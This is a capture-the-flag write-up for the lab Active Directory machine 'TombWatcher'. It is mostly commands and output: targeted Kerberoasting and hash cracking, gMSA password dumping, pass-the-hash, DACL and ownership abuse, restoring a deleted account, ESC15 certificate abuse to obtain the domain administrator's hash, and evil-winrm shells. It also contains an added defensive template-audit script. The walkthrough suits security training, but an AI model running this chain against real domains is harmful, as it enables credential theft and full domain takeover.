HTB — TombWatcher
Active Directory with ADCS misconfiguration. ESC1 certificate template abuse allows requesting a certificate as Domain Admin for full compromise.
As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!
nmap
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.72
Host is up (0.024s latency).
Not shown: 65514 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-08 09:17:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T09:18:50+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T09:18:50+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T09:18:50+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T09:18:50+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49683/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49729/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-08T09:18:11
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 4h00m00s, deviation: 0s, median: 4h00m00s
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 25.21 ms 10.10.14.1
2 25.29 ms 10.10.11.72
shares
nxc smb 10.10.11.72 -u henry -p 'H3nry_987TGV!' --shares
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\henry:H3nry_987TGV!
SMB 10.10.11.72 445 DC01 [*] Enumerated shares
SMB 10.10.11.72 445 DC01 Share Permissions Remark
SMB 10.10.11.72 445 DC01 ----- ----------- ------
SMB 10.10.11.72 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.72 445 DC01 C$ Default share
SMB 10.10.11.72 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.72 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.72 445 DC01 SYSVOL READ Logon server share
users
nxc smb 10.10.11.72 -u henry -p 'H3nry_987TGV!' --users
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\henry:H3nry_987TGV!
SMB 10.10.11.72 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.72 445 DC01 Administrator 2025-06-08 02:15:34 0 Built-in account for administering the computer/domain
SMB 10.10.11.72 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.72 445 DC01 krbtgt 2024-11-16 00:02:28 0 Key Distribution Center Service Account
SMB 10.10.11.72 445 DC01 Henry 2025-05-12 15:17:03 0
SMB 10.10.11.72 445 DC01 Alfred 2025-05-12 15:17:03 0
SMB 10.10.11.72 445 DC01 sam 2025-06-08 03:52:35 0
SMB 10.10.11.72 445 DC01 john 2025-06-08 04:47:42 0
SMB 10.10.11.72 445 DC01 [*] Enumerated 7 local users: TOMBWATCHER
Henry
Alfred
sam
john
bloodhound
sudo bloodhound-python -u 'Henry' -p 'H3nry_987TGV!' -ns 10.10.11.72 -d tombwatcher.htb -c all
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.tombwatcher.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 05S
WriteSPN

ntpdate tombwatcher.htb && python3 /opt/linux/targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'Henry' -p 'H3nry_987TGV!'
2025-06-08 06:48:01.718408 (-0400) +14401.208166 +/- 0.011067 tombwatcher.htb 10.10.11.72 s1 no-leap
CLOCK: time stepped by 14401.208166
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$2881d11e...
[VERBOSE] SPN removed successfully for (Alfred)
hashcat -m 13100 Alfred_tgs.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6-851-g6716447df) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-13th Gen Intel(R) Core(TM) i9-13900HX, 6939/13942 MB (2048 MB allocatable), 6MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$2881d11e...:basketball
creds
Alfred:basketball
nxc smb 10.10.11.72 -u Alfred -p 'basketball'
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\Alfred:basketball
AddSelf
The user ALFRED@TOMBWATCHER.HTB has the ability to add itself to the group INFRASTRUCTURE@TOMBWATCHER.HTB. Because of security group delegation, the members of a security group have the same privileges as that group.
By adding itself to the group, ALFRED@TOMBWATCHER.HTB will gain the same privileges that INFRASTRUCTURE@TOMBWATCHER.HTB already has.
https://www.thehacker.recipes/ad/movement/dacl/addmember
bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "Alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "Alfred"
[+] Alfred added to INFRASTRUCTURE
- verify users in group
net rpc group members "INFRASTRUCTURE" -U "tombwatcher.htb"/"Alfred"%"basketball" -S "10.10.11.72"
TOMBWATCHER\Alfred
ReadGMSAPassword

ANSIBLE_DEV$@TOMBWATCHER.HTB is a Group Managed Service Account. The group INFRASTRUCTURE@TOMBWATCHER.HTB can retrieve the password for the GMSA ANSIBLE_DEV$@TOMBWATCHER.HTB.
Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is managed by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).
The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.
python3 /opt/linux/gMSADumper.py -u 'Alfred' -p 'basketball' -d 'tombwatcher.htb'
Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::1c37d000...
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223...
nxc smb 10.10.11.72 -u ansible_dev$ -H '1c37d000...'
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\ansible_dev$:1c37d000...
ForceChangePassword

pth-net rpc password "sam" "Password123@" -U "tombwatcher.htb"/"ansible_dev$"%"ffffffff...":"1c37d000..." -S "10.10.11.72"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
WriteOwner

The user SAM@TOMBWATCHER.HTB has the ability to modify the owner of the user JOHN@TOMBWATCHER.HTB.
Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.
owneredit.py -action write -new-owner 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Password123@'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!
dacledit.py -action 'write' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Password123@'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250608-170120.bak
[*] DACL modified successfully!
force change password
bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "sam" -p "Password123@" set password "john" "Password123@"
[+] Password changed successfully!
winrm
nxc smb 10.10.11.72 -u john -p 'Password123@'
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\john:Password123@
evil-winrm -i 10.10.11.72 -u john -p 'Password123@'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> whoami
tombwatcher\john
*Evil-WinRM* PS C:\Users\john\desktop> ls
Directory: C:\Users\john\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/8/2025 11:01 AM 34 user.txt
*Evil-WinRM* PS C:\Users\john\desktop> cat user.txt
38ebdd9b...
user.txt
38ebdd9b...
sudo bloodhound-python -u 'john' -p 'Password123@' -ns 10.10.11.72 -d tombwatcher.htb -c all
search for deleted AD users
*Evil-WinRM* PS C:\> Get-ADObject -Filter 'ObjectClass -eq "user" -and IsDeleted -eq $true' -IncludeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : tombwatcher.htb/Deleted Objects/cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
CN : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
codePage : 0
countryCode : 0
Created : 11/16/2024 12:04:05 PM
createTimeStamp : 11/16/2024 12:04:05 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData : {11/16/2024 12:04:18 PM, 11/16/2024 12:04:08 PM, 12/31/1600 7:00:00 PM}
givenName : cert_admin
instanceType : 4
isDeleted : True
LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 11/16/2024 12:04:21 PM
modifyTimeStamp : 11/16/2024 12:04:21 PM
msDS-LastKnownRDN : cert_admin
Name : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358
objectSid : S-1-5-21-1392491010-1358638721-2126982587-1110
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133762502455822446
sAMAccountName : cert_admin
sDRightsEffective : 7
sn : cert_admin
userAccountControl : 66048
uSNChanged : 13171
uSNCreated : 13161
whenChanged : 11/16/2024 12:04:21 PM
whenCreated : 11/16/2024 12:04:05 PM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : tombwatcher.htb/Deleted Objects/adminaccess
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
CN : adminaccess
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
codePage : 0
countryCode : 0
Created : 11/16/2024 12:07:04 PM
createTimeStamp : 11/16/2024 12:07:04 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=adminaccess\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData : {6/8/2025 2:41:59 PM, 6/8/2025 2:30:15 PM, 6/8/2025 2:15:08 PM, 11/16/2024 12:07:10 PM...}
givenName : cert_admin
instanceType : 4
isDeleted : True
LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff : 0
lastLogon : 0
lastLogonTimestamp : 133938811244377253
logonCount : 0
Modified : 6/8/2025 2:52:01 PM
modifyTimeStamp : 6/8/2025 2:52:01 PM
msDS-LastKnownRDN : adminaccess
Name : adminaccess
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectSid : S-1-5-21-1392491010-1358638721-2126982587-1111
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133938817421095793
sAMAccountName : cert_admin
sDRightsEffective : 7
sn : cert_admin
userAccountControl : 66048
uSNChanged : 90535
uSNCreated : 13186
whenChanged : 6/8/2025 2:52:01 PM
whenCreated : 11/16/2024 12:07:04 PM
restore cert_admin
*Evil-WinRM* PS C:\> Restore-ADObject -Identity 'CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb'
reset cert_admin password
*Evil-WinRM* PS C:\> Set-ADAccountPassword -Identity 'cert_admin' -Reset -NewPassword (ConvertTo-SecureString 'P@ssw0rd123!' -AsPlainText -Force)
nxc smb 10.10.11.72 -u cert_admin -p 'P@ssw0rd123!'
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\cert_admin:P@ssw0rd123!
sudo bloodhound-python -u 'cert_admin' -p "P@ssw0rd123\!" -ns 10.10.11.72 -d tombwatcher.htb -c all
- delete old object in case a mistake was made
*Evil-WinRM* PS C:\Users\john\Documents> Remove-ADUser -Identity "cert_admin" -Confirm:$false
*Evil-WinRM* PS C:\Users\john\Documents> Restore-ADObject -Identity 'CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb'
*Evil-WinRM* PS C:\> Set-ADAccountPassword -Identity 'cert_admin' -Reset -NewPassword (ConvertTo-SecureString 'P@ssw0rd123!' -AsPlainText -Force)
certipy
certipy-ad find -u 'cert_admin@tombwatcher.htb' -p 'P@ssw0rd123!' -dc-ip '10.10.11.72' -vulnerable -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : tombwatcher-CA-1
DNS Name : DC01.tombwatcher.htb
Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
Certificate Serial Number : 3428A7FC52C310B2460F8440AA8327AC
Certificate Validity Start : 2024-11-16 00:47:48+00:00
Certificate Validity End : 2123-11-16 00:57:48+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : TOMBWATCHER.HTB\Administrators
Access Rights
ManageCa : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
ManageCertificates : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Enroll : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
0
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
ESC15
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
- https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc15-CVE-2024-49019-arbitrary-application-policy
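An added audit helper, not certipy's code and not from the original write-up, that applies the ESC1/ESC15 conditions certipy reported above to a template's raw LDAP attributes. The Template dataclass, check_template and the sample templates are constructed for this example; PAGE_WEBSERVER mirrors the WebServer values listed above, and WEBSERVER_V2 shows the same template after being re-created at schema version 2.

```python
from dataclasses import dataclass

# Bit in msPKI-Certificate-Name-Flag (MS-CRTD): the requester chooses subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag (MS-CRTD): every request waits for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that make an issued certificate usable for domain authentication.
CLIENT_AUTH_EKUS = frozenset({
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
})
SERVER_AUTH_EKU = "1.3.6.1.5.5.7.3.1"


@dataclass(frozen=True)
class Template:
    """Raw template attributes as read from CN=Certificate Templates in AD (constructed)."""
    name: str
    schema_version: int        # msPKI-Template-Schema-Version
    name_flag: int             # msPKI-Certificate-Name-Flag
    enrollment_flag: int       # msPKI-Enrollment-Flag
    ra_signatures: int         # msPKI-RA-Signature (authorized signatures required)
    ekus: frozenset            # pKIExtendedKeyUsage; empty means "any purpose"
    low_priv_enroll: bool      # an Enroll ACE is held by a non-admin principal


def check_template(t: Template) -> list[str]:
    """Return the ESC findings that apply, in the order certipy reports them."""
    supplies_subject = bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    needs_approval = bool(t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS)
    # No exposure without a low-privileged enrollee; manager approval or a
    # required enrollment-agent signature blocks unattended issuance.
    if not t.low_priv_enroll or needs_approval or t.ra_signatures > 0:
        return []
    client_auth = not t.ekus or bool(t.ekus & CLIENT_AUTH_EKUS)
    findings = []
    if supplies_subject and client_auth:
        findings.append("ESC1")
    # ESC15 (CVE-2024-49019): a schema-1 template lets the CA honour application
    # policies supplied in the request, so a server-auth-only EKU is no protection.
    if supplies_subject and t.schema_version == 1:
        findings.append("ESC15")
    return findings


# Constructed from the certipy output for WebServer on this box: schema 1,
# EnrolleeSuppliesSubject, Server Authentication EKU, cert_admin can enrol.
PAGE_WEBSERVER = Template("WebServer", 1, 0x1, 0x0, 0, frozenset({SERVER_AUTH_EKU}), True)

# Constructed: the same template re-created at schema version 2, which closes ESC15.
WEBSERVER_V2 = Template("WebServer", 2, 0x1, 0x0, 0, frozenset({SERVER_AUTH_EKU}), True)

# Constructed: the classic ESC1 shape (client-auth EKU plus requester-chosen SAN).
ESC1_SHAPE = Template("UserSAN", 2, 0x1, 0x0, 0, frozenset({"1.3.6.1.5.5.7.3.2"}), True)

# Constructed: ESC1 shape gated by manager approval, which removes the finding.
ESC1_GATED = Template("UserSAN", 2, 0x1, CT_FLAG_PEND_ALL_REQUESTS, 0,
                      frozenset({"1.3.6.1.5.5.7.3.2"}), True)

if __name__ == "__main__":
    for tpl in (PAGE_WEBSERVER, WEBSERVER_V2, ESC1_SHAPE, ESC1_GATED):
        print(f"{tpl.name:10} v{tpl.schema_version}: "
              f"{check_template(tpl) or 'no ESC1/ESC15 finding'}")
```

The approval and signature gates mirror the "Requires Manager Approval" and "Authorized Signatures Required" fields in the certipy listing, which is why either setting is a valid remediation alongside patching for CVE-2024-49019.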
certipy-ad req -u 'cert_admin' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca tombwatcher-CA-1 -template WebServer -dc-ip 10.10.11.72
certipy-ad req -u cert_admin@tombwatcher.htb -on-behalf-of tombwatcher\\Administrator -template User -ca tombwatcher-CA-1 -pfx cert.pfx -dc-ip 10.10.11.72
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.72
sudo ntpdate 10.10.11.72 && certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.72
2025-06-09 13:48:34.996578 (-0400) +14402.243926 +/- 0.013320 10.10.11.72 s1 no-leap
CLOCK: time stepped by 14402.243926
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@tombwatcher.htb'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
File 'administrator.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435...:f61db423...
evil-winrm -i 10.10.11.72 -u administrator -H 'f61db423...'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
tombwatcher\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
9474ca8d...